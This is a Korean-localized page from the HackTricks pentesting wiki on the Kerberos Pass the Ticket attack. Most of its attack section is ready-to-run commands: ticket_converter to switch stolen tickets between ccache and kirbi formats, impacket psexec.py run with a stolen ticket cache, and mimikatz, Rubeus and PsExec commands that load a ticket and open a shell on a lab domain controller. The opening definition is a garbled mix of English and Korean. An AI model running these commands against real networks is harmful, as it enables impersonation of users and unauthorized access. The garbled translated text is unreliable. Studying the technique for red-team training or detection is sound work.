Korean - Ht
HackTricks Training Twitter Linkedin Sponsor

Pass the Ticket

Support HackTricks

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Pass The Ticket (PTT)

In the Pass The Ticket (PTT) attack method, attackers 사용자의 인증 티켓을 훔칩니다 대신 비밀번호나 해시 값을. 이 훔친 티켓은 사용자를 가장하는 데 사용되어, 네트워크 내의 리소스와 서비스에 대한 무단 액세스를 얻습니다.

읽기:

플랫폼 간 Linux와 Windows 티켓 교환하기

The ticket_converter tool converts ticket formats using just the ticket itself and an output file.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

Windows에서는 Kekeo를 사용할 수 있습니다.

Pass The Ticket Attack

Linux
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
Windows
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

References

Trickest를 사용하여 세계에서 가장 진보된 커뮤니티 도구로 구동되는 워크플로우를 쉽게 구축하고 자동화하세요. 오늘 바로 접근하세요:

HackTricks 지원하기
PreviousOver Pass the Hash/Pass the KeyNextPassword Spraying / Brute Force

Last updated